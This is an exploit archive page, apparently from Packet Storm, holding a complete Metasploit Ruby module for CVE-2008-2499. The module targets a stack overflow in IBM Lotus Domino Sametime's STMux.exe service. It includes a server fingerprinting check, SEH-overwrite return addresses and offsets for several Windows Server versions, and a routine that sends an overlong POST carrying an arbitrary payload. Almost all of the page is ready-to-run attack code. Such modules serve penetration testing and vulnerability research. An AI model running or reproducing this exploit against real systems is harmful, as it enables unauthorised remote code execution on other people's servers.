exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

IBM Lotus Domino Sametime STMux.exe Stack Overflow

IBM Lotus Domino Sametime STMux.exe Stack Overflow
Posted Nov 26, 2009
Authored by patrick, riaf | Site metasploit.com

This Metasploit module exploits a stack overflow in Lotus Domino's Sametime Server. By sending an overly long POST request to the Multiplexer STMux.exe service we are able to overwrite SEH. Based on the exploit by Manuel Santamarina Suarez.

tags | exploit, overflow
advisories | CVE-2008-2499
SHA-256 | dbb922034950b5d503d3b1d3a1d7c5b5c97e423e24541e11f69c20a9ef2b6eba

IBM Lotus Domino Sametime STMux.exe Stack Overflow

Change Mirror Download
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'


class Metasploit3 < Msf::Exploit::Remote

include Msf::Exploit::Remote::Tcp

def initialize(info = {})
super(update_info(info,
'Name' => 'IBM Lotus Domino Sametime STMux.exe Stack Overflow',
'Description' => %q{
This module exploits a stack overflow in Lotus Domino's Sametime
Server. By sending an overly long POST request to the Multiplexer
STMux.exe service we are able to overwrite SEH. Based on the exploit
by Manuel Santamarina Suarez.
},
'Author' => [ 'patrick', 'riaf <riaf@mysec.org>' ],
'Arch' => [ ARCH_X86 ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2008-2499' ],
[ 'OSVDB', '45610' ],
[ 'BID', '29328' ],
[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-08-028/' ],
],
'Privileged' => true,
'DefaultOptions' =>
{
'EXITFUNC' => 'seh',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x0a\x0d",
'StackAdjustment' => -3500,
},
'Platform' => ['win'],
'Targets' =>
[
# Patrick - Tested OK against Windows 2003 SP1 20081114
[ 'Lotus Sametime 7.5 on Windows Server 2000 SP4', { 'Ret' => 0x7c3410c2, 'Offset' => [ 3, 268 ] }], # pop ecx, pop exc, ret msvcr71.dll
[ 'Lotus Sametime 7.5 on Windows Server 2003 SP1', { 'Ret' => 0x7c3410c2, 'Offset' => [ 3, 269 ] }], # pop ecx, pop exc, ret msvcr71.dll
[ 'Lotus Sametime 7.5 on Windows Server 2003 SP2', { 'Ret' => 0x7c3410c2, 'Offset' => [ 4, 269 ] }],
[ 'Lotus Sametime 7.5.1 Windows Server 2003 SP2', { 'Ret' => 0x7c3410c2, 'Offset' => [ 5, 269 ] }],
[ 'Lotus Sametime 8.0.0 Windows Server 2003 SP2', { 'Ret' => 0x7c3410c2, 'Offset' => [ 4, 269 ] }],
],
'DisclosureDate' => 'May 21 2008',
'DefaultTarget' => 1))

register_options(
[
Opt::RPORT(1533),
], self.class)
end

def check
connect

req = "HEAD / HTTP/1.0\r\n\r\n"
req << "User-Agent: Sametime Community Agent\r\n"
req << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"
sock.put(req)
res = sock.get_once(-1,3)

disconnect

if (res =~/Lotus-Domino/)
connect

req = "GET /CommunityCBR HTTP/1.0\r\n\r\n"
req << "User-Agent: Sametime Community Agent\r\n"
req << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"
sock.put(req)
res = sock.get_once(-1,3)

disconnect

if (res =~/200 OK/)
return Exploit::CheckCode::Detected
end
end

return Exploit::CheckCode::Safe
end

def exploit
connect

pad1 = rand_text_alpha_lower(44)
pad2 = rand_text_alpha_lower(29)

# Patrick - We should use Metasm here.
popebx = Metasm::Shellcode.assemble(Metasm::Ia32.new, "pop ebx").encode_string * target['Offset'][0]
popad = Metasm::Shellcode.assemble(Metasm::Ia32.new, "popad").encode_string * target['Offset'][1]
esp = "\xff\x24\x24" # dword ptr ss:[esp]
jmp = "\x74\x23" + "\x75\x21" # je short, jnz short
seh = [target['Ret']].pack('V')

path = pad1 + jmp + seh + pad2 + popebx + popad + esp

req = "POST /CommunityCBR/CC.39.#{path}/\r\n"
req << "User-Agent: Sametime Community Agent\r\n"
req << "Host: #{datastore['RHOST']}:#{datastore['RPORT']}\r\n"
req << "Content-Length: #{payload.encoded.length}\r\n"
req << "Connection: Close\r\n"
req << "Cache-Control: no-cache\r\n\r\n"
req << payload.encoded

sock.put(req)

handler
disconnect
end
end
Login or Register to add favorites

File Archive:

January 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    0 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    5 Files
  • 4
    Jan 4th
    5 Files
  • 5
    Jan 5th
    9 Files
  • 6
    Jan 6th
    5 Files
  • 7
    Jan 7th
    0 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    18 Files
  • 10
    Jan 10th
    31 Files
  • 11
    Jan 11th
    30 Files
  • 12
    Jan 12th
    33 Files
  • 13
    Jan 13th
    25 Files
  • 14
    Jan 14th
    0 Files
  • 15
    Jan 15th
    0 Files
  • 16
    Jan 16th
    7 Files
  • 17
    Jan 17th
    25 Files
  • 18
    Jan 18th
    38 Files
  • 19
    Jan 19th
    6 Files
  • 20
    Jan 20th
    21 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    24 Files
  • 24
    Jan 24th
    68 Files
  • 25
    Jan 25th
    22 Files
  • 26
    Jan 26th
    20 Files
  • 27
    Jan 27th
    17 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    20 Files
  • 31
    Jan 31st
    31 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close